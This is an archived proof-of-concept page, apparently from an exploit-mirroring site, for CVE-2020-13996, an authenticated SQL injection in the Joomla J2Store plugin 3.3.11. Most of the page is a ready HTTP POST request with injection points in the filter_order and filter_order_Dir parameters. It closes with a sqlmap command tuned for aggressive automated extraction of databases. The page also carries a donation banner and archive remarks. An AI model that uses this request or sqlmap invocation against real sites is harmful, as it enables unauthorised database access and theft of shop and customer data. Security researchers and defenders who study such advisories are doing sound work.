Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-13996 PoC — Joomla! J2Store plugin SQL注入漏洞

Source
Associated Vulnerability
Title:Joomla! J2Store plugin SQL注入漏洞 (CVE-2020-13996)
Description:Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。J2Store plugin是使用在其中的一个电子商务插件。 Joomla! J2Store plugin 3.3.13之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
Description
 Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection
Readme
Exploit Title: Joomla J2 Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)<br>
Date: 2020-04-17<br>
Exploit Author: Mehmet Kelepçe / Gais Cyber Security<br>
Vendor Homepage: https://www.j2store.org/<br>
Software Link: https://www.j2store.org/download.html<br>
Reference: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html<br>
Change Log: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html<br>
Version: 3.3.11<br>
Tested on: Kali Linux - Apache2<br>
-<br>
Detail:<br>
-<br>
File: administrator/components/com_j2store/models/products.php<br>
Vulnerable parameter: filter_order_Dir, filter_order<br>
<br>
PoC:<br>
Request:<br>
<br>
<br>
-<br>
POST /joomla/administrator/index.php HTTP/1.1<br>
Host: localhost<br>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0<br>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br>
Accept-Language: en-US,en;q=0.5<br>
Accept-Encoding: gzip, deflate<br>
Referer: http://localhost/joomla/administrator/index.php?option=com_j2store&view=products<br>
Content-Type: application/x-www-form-urlencoded<br>
Content-Length: 312<br>
Connection: close<br>
Cookie: [COOKIE]<br>
Upgrade-Insecure-Requests: 1<br>
<br>
option=com_j2store&view=products&task=browse&boxchecked=0&filter_order=[SQLi]&filter_order_Dir=[SQLi]&2d42ab72d5c2716881de5d802d08ca7f=1&search=1&product_type=0&limit=20&since=&until=&productid_from=&productid_to=&pricefrom=&priceto=&sku=&manufacturer_id=&vendor_id=&taxprofile_id=&visible=&limitstart=0
<br>-
<br>
<br>
<br>
sqlmap -r sqli --dbs --risk=3 --level=5 --random-agent -p filter_order_Dir<br>
<br>


File Snapshot

[4.0K] /data/pocs/373f94adf20764cfc77480a2fa767a4afc825c23 └── [1.6K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.